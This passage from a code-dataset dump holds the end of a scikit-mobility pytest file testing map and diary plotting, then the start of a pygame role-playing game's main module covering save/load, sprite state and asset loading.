...core.trajectorydataframe import TrajDataFrame, FlowDataFrame\nfrom .. 
import plot\nfrom ...utils import constants\nfrom ...preprocessing import detection, clustering\nimport folium\nimport matplotlib\n\nlat = constants.LATITUDE\nlng = constants.LONGITUDE\ndt = constants.DATETIME\nuid = constants.UID\ntid = constants.TID\natol = 1e-12\n\n\ndef all_equal(a, b):\n return np.allclose(a, b, rtol=0., atol=atol)\n\n\nlats_lngs = np.array([ [39.97, 116.32],\n [39.90, 116.51],\n [39.60, 116.60],\n [40.01, 115.90],\n [39.96, 115.85],\n [39.70, 115.80],\n [39.5999, 116.5999],\n [38.60, 115.56],\n [38.98, 114.51],\n [40.19, 114.32],\n [40.97, 113.82]])\n\ntraj = pd.DataFrame(lats_lngs, columns=[lat, lng])\n\ntraj[dt] = pd.to_datetime([\n '2013/01/01 8:00:00', '2013/01/01 8:05:00',\n '2013/01/01 8:10:00', '2013/01/01 9:00:00',\n '2013/01/01 9:01:00', '2013/01/02 9:55:00',\n '2013/01/02 9:57:00', '2013/01/02 10:40:00',\n '2013/01/01 1:00:00', '2013/01/01 1:00:10', '2013/01/01 2:00:00'])\n\ntraj[uid] = [1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2]\ntraj[tid] = [0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0]\n\ntdf_test = TrajDataFrame(traj)\n\nall_users = [1, 2, 3]\n\n\npoints = [shapely.geometry.Point(ll) for ll in [[39.97, 116.32], [39.90, 116.51]]]\n\nlines = [shapely.geometry.LineString(ll) for ll in [[[116.32, 39.97], [116.51, 39.90]],\n [[116.22, 39.87], [116.41, 39.80]]]]\n\npolygons = [shapely.geometry.Polygon(ll) for ll in [[[116.32, 39.97], [116.51, 39.90], [116.51, 39.97]],\n [[116.22, 39.87], [116.41, 39.80], [116.22, 39.80]]]]\n\n\n# tessellation\n\ntess_polygons = [[[7.481, 45.184],\n [7.481, 45.216],\n [7.526, 45.216],\n [7.526, 45.184],\n [7.481, 45.184]],\n [[7.481, 45.216],\n [7.481, 45.247],\n [7.526, 45.247],\n [7.526, 45.216],\n [7.481, 45.216]],\n [[7.526, 45.184],\n [7.526, 45.216],\n [7.571, 45.216],\n [7.571, 45.184],\n [7.526, 45.184]]]#,\n # [[7.526, 45.216],\n # [7.526, 45.247],\n # [7.571, 45.247],\n # [7.571, 45.216],\n # [7.526, 45.216]]]\n\ngeom = [shapely.geometry.Polygon(p) for p in tess_polygons]\ntessellation = gpd.GeoDataFrame(geometry=geom, crs=\"EPSG:4326\")\ntessellation = tessellation.reset_index().rename(columns={\"index\": constants.TILE_ID})\n\n\n# flows\n\nflow_list = [[1, 0, 1],\n [5, 0, 2],\n [3, 1, 0],\n [2, 1, 2],\n [8, 2, 0],\n [9, 2, 1],]\n\ndf = pd.DataFrame(flow_list, columns=[constants.FLOW, constants.ORIGIN, constants.DESTINATION])\nfdf = FlowDataFrame(df, tessellation=tessellation)\n\n\n# plot_trajectory\n\n@pytest.mark.parametrize('tdf', [tdf_test])\n@pytest.mark.parametrize('marker', [True, False])\ndef test_plot_trajectory(tdf, marker):\n map_f = plot.plot_trajectory(tdf, start_end_markers=marker)\n assert isinstance(map_f, folium.folium.Map)\n\n\n@pytest.mark.parametrize('tdf', [tdf_test])\n@pytest.mark.parametrize('marker', [True, False])\ndef test_plot_trajectory_tdf(tdf, marker):\n map_f = tdf.plot_trajectory(start_end_markers=marker)\n assert isinstance(map_f, folium.folium.Map)\n\n\n# plot_stops\n\n@pytest.mark.parametrize('tdf', [tdf_test])\ndef test_plot_stops(tdf):\n map_f = plot.plot_trajectory(tdf)\n # map_f = plot.plot_stops(tdf, map_f=map_f)\n\n stdf = detection.stay_locations(tdf)\n map_f = plot.plot_stops(stdf, map_f=map_f)\n\n assert isinstance(map_f, folium.folium.Map)\n\n\n@pytest.mark.parametrize('tdf', [tdf_test])\ndef test_plot_stops_tdf(tdf):\n map_f = tdf.plot_trajectory()\n # map_f = tdf.plot_stops(map_f=map_f)\n\n stdf = detection.stay_locations(tdf)\n map_f = stdf.plot_stops(map_f=map_f)\n\n assert isinstance(map_f, folium.folium.Map)\n\n\n# plot_diary\n\n@pytest.mark.parametrize('tdf', 
[tdf_test])\n@pytest.mark.parametrize('user', [1, 2])\n@pytest.mark.parametrize('start_datetime', [None, '2013/01/01 00:00:00'])\ndef test_plot_diary(tdf, user, start_datetime):\n    stdf = detection.stay_locations(tdf)\n    cstdf = clustering.cluster(stdf)\n    ax = plot.plot_diary(cstdf, user, start_datetime=start_datetime)\n\n    assert isinstance(ax, matplotlib.axes._subplots.Subplot)\n\n\n@pytest.mark.parametrize('tdf', [tdf_test])\n@pytest.mark.parametrize('user', [1, 2])\n@pytest.mark.parametrize('start_datetime', [None, '2013/01/01 00:00:00'])\ndef test_plot_diary_tdf(tdf, user, start_datetime):\n    stdf = detection.stay_locations(tdf)\n    cstdf = clustering.cluster(stdf)\n    ax = cstdf.plot_diary(user, start_datetime=start_datetime)\n\n    assert isinstance(ax, matplotlib.axes._subplots.Subplot)\n\n\n# plot_flows\n\n@pytest.mark.parametrize('fdf', [fdf])\n@pytest.mark.parametrize('min_flow', [0, 2])\n@pytest.mark.parametrize('flow_popup', [False, True])\ndef test_plot_flows(fdf, min_flow, flow_popup):\n    map_f = plot.plot_flows(fdf, min_flow=min_flow, flow_popup=flow_popup)\n    assert isinstance(map_f, folium.folium.Map)\n\n@pytest.mark.parametrize('fdf', [fdf])\n@pytest.mark.parametrize('min_flow', [0, 2])\n@pytest.mark.parametrize('flow_popup', [False, True])\ndef test_plot_flows_fdf(fdf, min_flow, flow_popup):\n    map_f = fdf.plot_flows(min_flow=min_flow, flow_popup=flow_popup)\n    assert isinstance(map_f, folium.folium.Map)\n\n\n# plot_gdf\n\n@pytest.mark.parametrize('geom', [points, lines, polygons])\ndef test_plot_gdf(geom):\n    gdf = gpd.GeoDataFrame(geom, columns=['geometry'])\n    map_f = plot.plot_gdf(gdf)\n    assert isinstance(map_f, folium.folium.Map)\n\n\n","repo_name":"scikit-mobility/scikit-mobility","sub_path":"skmob/utils/tests/test_plots.py","file_name":"test_plots.py","file_ext":"py","file_size_in_byte":5694,"program_lang":"python","lang":"en","doc_type":"code","stars":661,"dataset":"github-code","pt":"66"} +{"seq_id":"20172938456","text":"# The Legend of Sky Realm by Raven Ironwing\n\nimport tracemalloc\nimport gc\nimport pygame as pg\nimport sys\nimport pickle\nimport pygame.surfarray as surfarray\nfrom random import choice, random, choices\nfrom os import path, makedirs\nfrom settings import *\nfrom npcs import *\nfrom quests import *\nfrom menu import *\nfrom sprites import *\nfrom tilemap import *\nimport datetime\nfrom time import sleep, perf_counter\nimport math\nfrom menu import Item_Icon\nfrom pygame.locals import *\nfrom pytmx.util_pygame import load_pygame\nimport pyscroll\nimport pyscroll.data\nfrom pyscroll.group import PyscrollGroup\n\ntracemalloc.start()\n\n#npc_q = Queue()\n\n#def get_tile_number(sprite, layer): # Gets the type of tile a sprite is on.\n#    x = int(sprite.pos.x / sprite.game.map.tile_size)\n#    y = int(sprite.pos.y / sprite.game.map.tile_size)\n#    if x < 0: x = 0\n#    if y < 0: y = 0\n#    if x >= sprite.game.map.tiles_wide: x = sprite.game.map.tiles_wide - 1\n#    if y >= sprite.game.map.tiles_high: y = sprite.game.map.tiles_high - 1\n#    return sprite.game.map.tmxdata.get_tile_gid(x, y, layer)\n\n#def get_tile_props(sprite, layer): # Gets the type of tile a sprite is on.\n#    x = int(sprite.pos.x / sprite.game.map.tile_size)\n#    y = int(sprite.pos.y / sprite.game.map.tile_size)\n#    if x < 0: x = 0\n#    if y < 0: y = 0\n#    if x >= sprite.game.map.tiles_wide: x = sprite.game.map.tiles_wide - 1\n#    if y >= sprite.game.map.tiles_high: y = sprite.game.map.tiles_high - 1\n#    return sprite.game.map.tmxdata.get_tile_properties(x, y, layer)\n\n\ndef trace_mem():\n    snapshot = 
tracemalloc.take_snapshot()\n top_stats = snapshot.statistics('lineno')\n\n print(\"[ Top 10 ]\")\n for stat in top_stats[:10]:\n print(stat)\n\n# HUD functions\ndef draw_player_stats(surf, x, y, pct, color = GREEN, bar_length = 100):\n if pct < 0:\n pct = 0\n bar_height = 20\n fill = pct * bar_length\n outline_rect = pg.Rect(x, y, bar_length, bar_height)\n fill_rect = pg.Rect(x, y, fill, bar_height)\n if pct > 0.6:\n col = color\n elif pct > 0.3:\n col = YELLOW\n else:\n col = RED\n pg.draw.rect(surf, col, fill_rect)\n pg.draw.rect(surf, WHITE, outline_rect, 2)\n\n# Used for loading sprite sheet images into a list of images\n\ndef load_spritesheet(sheet, size):\n image_list = []\n sheet_width = sheet.get_width()\n sheet_height = sheet.get_height()\n columns = int(sheet_width / size)\n rows = int(sheet_height / size)\n # Create a new blank image\n\n for col in range(0, columns):\n y = col * size\n for row in range(0, rows):\n x = row * size\n image = pg.Surface([size, size], pg.SRCALPHA).convert_alpha()\n # Copy the sprite from the large sheet onto the smaller image\n image.blit(sheet, (0, 0), (x, y, size, size))\n image_list.append(image)\n # Return the separate images stored in a list.\n return image_list\n\n# Used to see if the player is in talking range of an Npc\ndef npc_talk_rect(one, two):\n if one.hit_rect.colliderect(two.talk_rect):\n return True\n else:\n return False\n\ndef mob_hit_rect(one, two):\n if one.hit_rect.colliderect(two.hit_rect):\n return True\n else:\n return False\n\ndef breakable_melee_hit_rect(one, two):\n if one.mother.weapon_hand == 'weapons':\n if True in (one.mid_weapon_melee_rect.colliderect(two.trunk.hit_rect), one.weapon_melee_rect.colliderect(two.trunk.hit_rect), one.melee_rect.colliderect(two.trunk.hit_rect)):\n if one.swing_weapon1: # This differentiates between weapons that are being swung and those that are thrusted.\n if one.frame > 6:\n return True\n elif one.frame < 6:\n return True\n else:\n return False\n\n elif one.mother.weapon_hand == 'weapons2':\n if True in (one.mid_weapon2_melee_rect.colliderect(two.trunk.hit_rect), one.weapon2_melee_rect.colliderect(two.trunk.hit_rect), one.melee2_rect.colliderect(two.trunk.hit_rect)):\n if one.swing_weapon2:\n if one.frame > 6:\n return True\n elif one.frame < 6:\n return True\n return False\n\n# Used to define fireball hits\ndef fire_collide(one, two):\n if one.hit_rect.colliderect(two.hit_rect):\n return True\n else:\n return False\n\ndef entryway_collide(one, two):\n if one.rect.colliderect(two.hit_rect):\n return True\n else:\n return False\n\nclass Game:\n def __init__(self):\n self.screen_width = WIDTH\n self.screen_height = HEIGHT\n #self.flags = pg.NOFRAME\n self.flags = pg.SCALED # | pg.FULLSCREEN\n #self.screen = pg.display.set_mode((self.screen_width, HEIGHT), pg.FULLSCREEN)\n icon_image = pg.image.load(path.join(img_folder, ICON_IMG))\n pg.display.set_icon(icon_image)\n self.screen = pg.display.set_mode((self.screen_width, self.screen_height), self.flags)\n pg.display.set_caption(TITLE)\n self.clock = pg.time.Clock()\n self.dt = 0.0001\n # Loads Mutant Python Logo Faid in/out.\n mpy_logo_image = pg.image.load(path.join(img_folder, LOGO_IMAGE)).convert_alpha()\n mpy_logo_image = pg.transform.scale(mpy_logo_image, (int(self.screen_height/4), int(self.screen_height/4)))\n logo_width = mpy_logo_image.get_width()\n logo_placement = ((self.screen_width - logo_width)/2, (self.screen_height - logo_width)/2)\n mpy_words_image = pg.image.load(path.join(img_folder, MPY_WORDS)).convert_alpha()\n 
mpy_words_image = pg.transform.scale(mpy_words_image, (int(self.screen_width/4), int(self.screen_height/8)))\n words_height = mpy_words_image.get_height()\n words_width = mpy_words_image.get_width()\n words_placement = ((self.screen_width - words_width)/2, (self.screen_height - words_height)/2)\n for i in range(0, 256):\n self.clock.tick(120)\n self.screen.fill(BLACK)\n pg.display.flip()\n for i in range(0, 256):\n self.clock.tick(120)\n self.screen.fill(BLACK)\n mpy_logo_image.set_alpha(i)\n if i == 10:\n pg.mixer.Sound(path.join(snd_folder, 'mutant_python.ogg')).play()\n self.screen.blit(mpy_logo_image, logo_placement)\n pg.display.flip()\n self.load_data()\n for i in range(255, 0, -1):\n self.clock.tick(120)\n self.screen.fill(BLACK)\n mpy_logo_image.set_alpha(i)\n self.screen.blit(mpy_logo_image, logo_placement)\n pg.display.flip()\n for i in range(0, 256):\n self.clock.tick(120)\n self.screen.fill(BLACK)\n pg.display.flip()\n self.channel2 = pg.mixer.Channel(2)\n self.channel3 = pg.mixer.Channel(3)\n self.channel4 = pg.mixer.Channel(4)\n self.channel5 = pg.mixer.Channel(5)\n self.channel6 = pg.mixer.Channel(6)\n self.channel7 = pg.mixer.Channel(7)\n self.channel_list = [self.channel2, self.channel3, self.channel4, self.channel5, self.channel6, self.channel7]\n\n def on_screen(self, sprite, threshold = 50):\n rect = self.camera.apply(sprite)\n if rect.right < -threshold or rect.bottom < -threshold or rect.left > self.screen_width + threshold or rect.top > self.screen_height + threshold:\n return False\n else:\n return True\n\n# def on_screen_no_edge(self, sprite): #no threashold for slightly faster draw.\n# rect = self.camera.apply(sprite)\n# if rect.right < 0 or rect.bottom < 0 or rect.left > self.screen_width or rect.top > self.screen_height:\n# return False\n# else:\n# return True\n\n def is_living(self, npc_kind):\n if 'dead' in self.people[npc_kind]:\n if self.people[npc_kind]['dead']:\n return False\n else:\n return True\n else:\n return True\n\n def format_date(self):\n directive = \"%m-%d-%Y_%H-%M-%S\"\n return datetime.datetime.now().strftime(directive)\n\n def save_sprite_locs(self):\n # This block stores all sprite locations and their health/inventories in the map_sprite_data_list so the game remembers where everything is.\n npc_list = []\n animal_list = []\n item_list = []\n vehicle_list = []\n breakable_list = []\n if not self.underworld:\n for npc in self.npcs:\n if npc not in self.companions:\n npc_list.append({'name': npc.kind, 'location': npc.pos})\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].npcs = npc_list\n for animal in self.animals:\n if animal not in self.companions:\n if animal != self.player.vehicle:\n animal_list.append({'name': animal.kind, 'location': animal.pos})\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].animals = animal_list\n for item in self.dropped_items:\n item_list.append({'name': item.name, 'location': item.pos, 'rotation': item.rot})\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].items = item_list\n for vehicle in self.vehicles:\n if vehicle.driver != self.player:\n vehicle_list.append({'name': vehicle.kind, 'location': vehicle.pos})\n self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].vehicles = vehicle_list\n for breakable in self.breakable:\n breakable_list.append({'name': breakable.name, 'location': breakable.center, 'w': breakable.w, 'h': breakable.h, 'rotation': breakable.rot})\n 
self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)].breakable = breakable_list\n        else:\n            for npc in self.npcs:\n                if npc not in self.companions:\n                    npc_list.append({'name': npc.kind, 'location': npc.pos})\n            self.underworld_sprite_data_dict[self.previous_map].npcs = npc_list\n            for animal in self.animals:\n                if animal not in self.companions:\n                    if animal != self.player.vehicle:\n                        animal_list.append({'name': animal.kind, 'location': animal.pos})\n            self.underworld_sprite_data_dict[self.previous_map].animals = animal_list\n            for item in self.dropped_items:\n                item_list.append({'name': item.name, 'location': item.pos, 'rotation': item.rot})\n            self.underworld_sprite_data_dict[self.previous_map].items = item_list\n            for vehicle in self.vehicles:\n                vehicle_list.append({'name': vehicle.kind, 'location': vehicle.pos})\n            self.underworld_sprite_data_dict[self.previous_map].vehicles = vehicle_list\n            for breakable in self.breakable:\n                breakable_list.append({'name': breakable.name, 'location': breakable.center, 'w': breakable.w, 'h': breakable.h, 'rotation': breakable.rot})\n            self.underworld_sprite_data_dict[self.previous_map].breakable = breakable_list\n\n    def save(self, slot):\n        self.screen.fill(BLACK)\n        self.save_sprite_locs()\n        possessing = self.player.possessing\n        if self.player.possessing:\n            self.player.possessing.depossess()\n        self.player.dragon = False\n        if 'dragon' in self.player.equipped['race']: # Makes it so you aren't a dragon when you load a game.\n            self.player.equipped['race'] = self.player.equipped['race'].replace('dragon', '')\n            self.player.body.update_animations()\n        self.draw_text('Saving....', self.script_font, 50, WHITE, self.screen_width / 2, self.screen_height / 2, align=\"topright\")\n        pg.display.flip()\n        sleep(0.5)\n        companion_list = []\n        for companion in self.companions:\n            companion_list.append(companion.kind)\n        vehicle_name = None\n        if self.player.in_vehicle:\n            vehicle_name = self.player.vehicle.kind\n\n        # self.previous_map is used to keep track of the last map you were on.\n        save_list = [self.player.inventory, self.player.equipped, self.player.stats, self.player.expanded_inventory, [self.player.pos.x, self.player.pos.y], self.previous_map, [self.world_location.x, self.world_location.y], self.overworld_map, vehicle_name, companion_list, self.map_sprite_data_list, self.key_map, self.animals_dict, self.people, self.quests]\n        if not path.isdir(saves_folder): makedirs(saves_folder)\n\n        with open(path.join(saves_folder, str(slot) + \"_\" + self.format_date() + \".sav\"), \"wb\", -1) as FILE:\n            pickle.dump(save_list, FILE)\n        if possessing:\n            possessing.possess(self.player)\n\n    def load_save(self, file_name):\n        self.continued_game = True\n        load_file = []\n        with open(file_name, \"rb\", -1) as FILE:\n            load_file = pickle.load(FILE)\n        self.player.inventory = load_file[0]\n        self.player.equipped = load_file[1]\n        self.player.stats = load_file[2]\n        self.player.expanded_inventory = load_file[3]\n        self.player.pos = vec(load_file[4])\n        self.previous_map = load_file[5]\n        self.world_location = vec(load_file[6])\n        self.overworld_map = load_file[7]\n        self.saved_vehicle = load_file[8]\n        self.saved_companions = load_file[9]\n        self.map_sprite_data_list = load_file[10]\n        self.key_map = load_file[11]\n        self.animals_dict = load_file[12]\n        self.people = load_file[13]\n        self.quests = load_file[14]\n        self.load_over_map(self.overworld_map)\n        self.load_map(self.previous_map)\n        self.map.stored_map_data = self.map_sprite_data_list[int(self.world_location.x)][int(self.world_location.y)] # Sets the map 
stored data object to the one that was saved for that map location.\n        self.map.load_stored_data() # Loads the stored data into the map\n        self.player.human_body.update_animations()\n        self.player.dragon_body.update_animations()\n        self.player.calculate_fire_power()\n        #self.player.calculate_perks()\n        #Update hud stats\n        self.hud_health_stats = self.player.stats\n        self.hud_health = self.hud_health_stats['health'] / self.hud_health_stats['max health']\n        self.hud_stamina = self.hud_health_stats['stamina'] / self.hud_health_stats['max stamina']\n        self.hud_magica = self.hud_health_stats['magica'] / self.hud_health_stats['max magica']\n        self.hud_hunger = self.hud_health_stats['hunger'] / self.hud_health_stats['max hunger']\n        # Loads saved companions\n        for companion in self.saved_companions:\n            for npc_type in NPC_TYPE_LIST:\n                if companion in eval(npc_type.upper()):\n                    rand_angle = randrange(0, 360)\n                    random_vec = vec(170, 0).rotate(-rand_angle)\n                    follower_center = vec(self.player.pos + random_vec)\n                    if npc_type == 'animals':\n                        if companion != self.saved_vehicle: #Makes it so it doesn't double load companions you are riding.\n                            follower = Animal(self, follower_center.x, follower_center.y, companion)\n                            follower.offensive = False\n                            follower.make_companion()\n                    else:\n                        follower = Player(self, follower_center.x, follower_center.y, companion)\n                        follower.offensive = False\n                        follower.make_companion()\n        self.saved_companions = []\n        # Enters vehicle if you saved it inside a vehicle\n        for vehicle in self.vehicles:\n            if vehicle.kind == self.saved_vehicle:\n                vehicle.enter_vehicle(self.player)\n        for vehicle in self.flying_vehicles:\n            if vehicle.kind == self.saved_vehicle:\n                vehicle.enter_vehicle(self.player)\n        if self.saved_vehicle in self.animals_dict:\n            mount = Animal(self, self.player.pos.x, self.player.pos.y, self.saved_vehicle)\n            mount.mount(self.player)\n\n    def update_old_save(self, file_name):\n        load_file = []\n        with open(file_name, \"rb\", -1) as FILE:\n            load_file = pickle.load(FILE)\n        # Loads saved upgraded equipment:\n        self.people = PEOPLE # Updates NPCs\n        self.animals_dict = ANIMALS\n        self.quests = QUESTS # Updates Quests from save\n        self.key_map = KEY_MAP\n        self.player.inventory = load_file[0]\n        self.player.equipped = load_file[1]\n        self.player.stats = load_file[2]\n        self.player.expanded_inventory = load_file[3]\n        self.player.pos = vec(load_file[4])\n        self.previous_map = load_file[5]\n        self.world_location = vec(load_file[6])\n        self.overworld_map = load_file[7]\n        self.saved_vehicle = load_file[8]\n        self.saved_companions = load_file[9]\n        self.map_sprite_data_list = load_file[10]\n        self.key_map = load_file[11]\n        self.animals_dict = load_file[12]\n        self.people = load_file[13]\n        self.quests = load_file[14]\n        self.load_map(self.previous_map)\n        self.player.pos = vec(load_file[4])\n        self.player.human_body.update_animations()\n        self.player.dragon_body.update_animations()\n        self.player.calculate_fire_power()\n        #self.player.calculate_perks()\n        self.overworld_map = load_file[7]\n        self.load_over_map(self.overworld_map)\n\n    def draw_text(self, text, font_name, size, color, x, y, align=\"topleft\"):\n        font = pg.font.Font(font_name, size)\n        text_surface = font.render(text, True, color)\n        text_rect = text_surface.get_rect(**{align: (x, y)})\n        self.screen.blit(text_surface, text_rect)\n\n\n    def load_data(self):\n        self.title_font = HEADING_FONT\n        self.hud_font = HUD_FONT\n        self.script_font = SCRIPT_FONT\n        self.dim_screen = pg.Surface(self.screen.get_size()).convert_alpha()\n        self.dim_screen.fill((SHADOW))\n        self.body_surface = 
pg.Surface((64, 64)).convert()\n self.body_surface.set_colorkey(BLACK)\n self.open_book_image = pg.image.load(path.join(img_folder, 'open_book.png')).convert()\n self.open_book_image = pg.transform.scale(self.open_book_image, (self.screen_width, self.screen_height - 30))\n self.open_letter_image = pg.image.load(path.join(img_folder, 'open_letter.png')).convert()\n self.open_letter_image = pg.transform.scale(self.open_letter_image, (self.screen_width, self.screen_height - 30))\n self.over_minimap_image = pg.image.load(path.join(img_folder, OVERWORLD_MAP_IMAGE)).convert()\n self.over_minimap_image = pg.transform.scale(self.over_minimap_image, (self.screen_height, self.screen_height))\n self.compass_image = pg.image.load(path.join(img_folder, 'compass.png')).convert_alpha()\n self.crosshair_image = pg.image.load(path.join(img_folder, 'crosshair.png')).convert_alpha()\n self.crosshair_offset = int(self.crosshair_image.get_width()/2)\n self.player_tur = pg.image.load(path.join(img_folder, PLAYER_TUR)).convert_alpha()\n #self.player_tank = pg.image.load(path.join(img_folder, PLAYER_TANK)).convert_alpha()\n #self.tank_in_water = pg.image.load(path.join(img_folder, TANK_IN_WATER)).convert_alpha()\n #self.sunken_tank = pg.image.load(path.join(img_folder, SUNKEN_TANK)).convert_alpha()\n self.lock_image = pg.image.load(path.join(img_folder, 'lock.png')).convert_alpha()\n self.lock_keyway_image = pg.image.load(path.join(img_folder, 'lock_keyway.png')).convert_alpha()\n self.keyed_keyway_image = pg.image.load(path.join(img_folder, 'keyed_keyway.png')).convert_alpha()\n self.lock_pick_image = pg.image.load(path.join(img_folder, 'lock_pick.png')).convert_alpha()\n self.swim_shadow_image = pg.image.load(path.join(img_folder, 'swim_shadow.png')).convert_alpha()\n self.mech_back_image = pg.image.load(path.join(img_folder, 'mech_back_lights.png')).convert_alpha()\n self.clear_box_image = pg.image.load(path.join(img_folder, 'clear_box.png')).convert_alpha()\n self.black_box_image = pg.image.load(path.join(img_folder, 'black_box.png')).convert()\n self.dark_grey_box_image = pg.image.load(path.join(img_folder, 'dark_grey_box.png')).convert()\n self.grey_box_image = pg.image.load(path.join(img_folder, 'grey_box.png')).convert()\n self.start_icon_image = pg.image.load(path.join(img_folder, 'start_icon.png')).convert()\n self.right_arrow_image = pg.transform.scale(pg.image.load(path.join(img_folder, 'right_arrow.png')).convert(), (ICON_SIZE, ICON_SIZE))\n self.back_arrow_image = pg.transform.scale(pg.image.load(path.join(img_folder, 'back_arrow.png')).convert(), (ICON_SIZE, ICON_SIZE))\n self.trash_image = pg.image.load(path.join(img_folder, 'trash.png')).convert()\n self.book_images = []\n for i in range(0, 6):\n image = pg.image.load(path.join(book_animation_folder, 'book{}.png'.format(i))).convert()\n image = pg.transform.scale(image, (self.screen_width, self.screen_height))\n self.book_images.append(image)\n #self.rock_shadow_image = pg.image.load(path.join(img_folder, 'rock_shadow.png')).convert_alpha()\n self.invisible_image = pg.image.load(path.join(img_folder, 'invisible.png')).convert_alpha()\n # creates a dictionary of animal images. 
This is not in the settings file like the others because of the order it needs to import info.\n ANIMAL_IMAGES = {}\n for animal in ANIMAL_ANIMATIONS:\n temp_list = []\n number_of_files = len([name for name in os.listdir(animals_folder) if animal in name if os.path.isfile(os.path.join(animals_folder, name))])\n for i in range(1, number_of_files + 1):\n filename = animal + '{}.png'.format(i)\n temp_list.append(filename)\n ANIMAL_IMAGES[animal] = temp_list\n # Loads animal images\n self.animal_images = {}\n for kind in ANIMAL_IMAGES:\n temp_list = []\n for i, picture in enumerate(ANIMAL_IMAGES[kind]):\n img = pg.image.load(path.join(animals_folder, ANIMAL_IMAGES[kind][i])).convert_alpha()\n temp_list.append(img)\n self.animal_images[kind] = temp_list\n # associates the animation frames with the animal images\n self.animal_animations = {}\n for kind in ANIMAL_ANIMATIONS:\n temp_dict = {}\n for animation in ANIMAL_ANIMATIONS[kind]:\n temp_list = []\n for frame in ANIMAL_ANIMATIONS[kind][animation]:\n temp_list.append(self.animal_images[kind][frame - 1])\n temp_dict[animation] = temp_list\n self.animal_animations[kind] = temp_dict\n self.bullet_images = {}\n for x, size in enumerate(BULLET_SIZES):\n for i, item in enumerate(BULLET_IMAGES):\n bullet_img = pg.image.load(path.join(bullets_folder, BULLET_IMAGES[i])).convert_alpha()\n if size != 'ar':\n if i != 0:\n img = pg.transform.scale(bullet_img, (3*(x + 1), 2*(x + 1)))\n else:\n img = pg.transform.scale(bullet_img, (6 * (x + 1), 2 * (x + 1)))\n else:\n img = pg.transform.scale(bullet_img, (40, 5))\n bullet_name = size + str(i)\n self.bullet_images[bullet_name] = img\n\n self.enchantment_images = []\n for i, item in enumerate(ENCHANTMENT_IMAGES):\n img = pg.image.load(path.join(enchantments_folder, ENCHANTMENT_IMAGES[i])).convert_alpha()\n self.enchantment_images.append(img)\n\n self.hair_images = {}\n for item in HAIR_IMAGES:\n img = pg.image.load(path.join(hair_folder, HAIR_IMAGES[item])).convert_alpha()\n self.hair_images[item] = img\n\n self.race_images = {}\n for item in RACE_IMAGES:\n img = pg.image.load(path.join(race_folder, RACE_IMAGES[item])).convert_alpha()\n self.race_images[item] = img\n\n self.item_images = {}\n for item in NEW_ITEM_IMAGES:\n img = pg.image.load(path.join(new_items_folder, NEW_ITEM_IMAGES[item])).convert_alpha()\n self.item_images[item] = img\n\n self.workstation_images = {}\n for item in WORKSTATION_IMAGES:\n img = pg.image.load(path.join(workstations_folder, WORKSTATION_IMAGES[item])).convert_alpha()\n self.workstation_images[item] = img\n\n \"\"\"\n self.weapon_images = []\n for i, weapon in enumerate(WEAPON_IMAGES):\n img = pg.image.load(path.join(weapons_folder, WEAPON_IMAGES[i])).convert_alpha()\n self.weapon_images.append(img)\n self.hat_images = []\n for i, hat in enumerate(HAT_IMAGES):\n img = pg.image.load(path.join(hats_folder, HAT_IMAGES[i])).convert_alpha()\n self.hat_images.append(img)\n self.top_images = []\n for i, top in enumerate(TOP_IMAGES):\n img = pg.image.load(path.join(tops_folder, TOP_IMAGES[i])).convert_alpha()\n self.top_images.append(img)\n self.bottom_images = []\n for i, bottom in enumerate(BOTTOM_IMAGES):\n img = pg.image.load(path.join(bottoms_folder, BOTTOM_IMAGES[i])).convert_alpha()\n self.bottom_images.append(img)\n self.shoe_images = []\n for i, shoe in enumerate(SHOE_IMAGES):\n img = pg.image.load(path.join(shoes_folder, SHOE_IMAGES[i])).convert_alpha()\n self.shoe_images.append(img)\n self.glove_images = []\n for i, glove in enumerate(GLOVE_IMAGES):\n img = 
pg.image.load(path.join(gloves_folder, GLOVE_IMAGES[i])).convert_alpha()\n self.glove_images.append(img)\"\"\"\n\n self.light_mask_images = []\n for i, val in enumerate(LIGHT_MASK_IMAGES):\n img = pg.image.load(path.join(light_masks_folder, LIGHT_MASK_IMAGES[i])).convert_alpha()\n self.light_mask_images.append(img)\n\n # Prescaling of lights\n self.flame_light_mask = pg.transform.scale(self.light_mask_images[1], (FLAME_TILE_BRIGHTNESS, FLAME_TILE_BRIGHTNESS))\n self.flame_light_mask_rect = self.flame_light_mask.get_rect()\n self.coals_light_mask = pg.transform.scale(self.light_mask_images[0], (FLAME_TILE_BRIGHTNESS, FLAME_TILE_BRIGHTNESS))\n self.coals_light_mask_rect = self.coals_light_mask.get_rect()\n self.candle_light_mask = pg.transform.scale(self.light_mask_images[1], (CANDLE_BRIGHTNESS, CANDLE_BRIGHTNESS))\n self.candle_light_mask_rect = self.candle_light_mask.get_rect()\n\n self.flashlight_masks = []\n temp_img = pg.transform.scale(self.light_mask_images[3], (int(300 * 2.8), 300))\n for rot in range(0, 120):\n new_image = pg.transform.rotate(temp_img, rot*3)\n self.flashlight_masks.append(new_image)\n\n self.magic_images = {}\n for item in MAGIC_IMAGES:\n img = pg.image.load(path.join(magic_folder, MAGIC_IMAGES[item])).convert_alpha()\n self.magic_images[item] = img\n\n self.magic_animation_images = {}\n for key, image in self.magic_images.items():\n image_list = []\n # enlarge image animation\n for i in range(0, 5):\n new_image = pg.transform.scale(image, (13*i, 13*i))\n image_list.append(new_image)\n # shrink animation\n for i in range(1, 10):\n new_image = pg.transform.scale(image, (int(70/i), int(70/i)))\n image_list.append(new_image)\n self.magic_animation_images[key] = image_list\n\n self.gender_images = []\n for i, gender in enumerate(GENDER_IMAGES):\n img = pg.image.load(path.join(gender_folder, GENDER_IMAGES[i])).convert_alpha()\n self.gender_images.append(img)\n self.corpse_images = []\n for i, corpse in enumerate(CORPSE_IMAGES):\n img = pg.image.load(path.join(corpse_folder, CORPSE_IMAGES[i])).convert_alpha()\n self.corpse_images.append(img)\n self.vehicle_images = []\n for i, x in enumerate(VEHICLES_IMAGES):\n img = pg.image.load(path.join(vehicles_folder, VEHICLES_IMAGES[i])).convert_alpha()\n self.vehicle_images.append(img)\n self.color_swatch_images = []\n for i, x in enumerate(COLOR_SWATCH_IMAGES):\n img = pg.image.load(path.join(color_swatches_folder, COLOR_SWATCH_IMAGES[i])).convert()\n self.color_swatch_images.append(img)\n 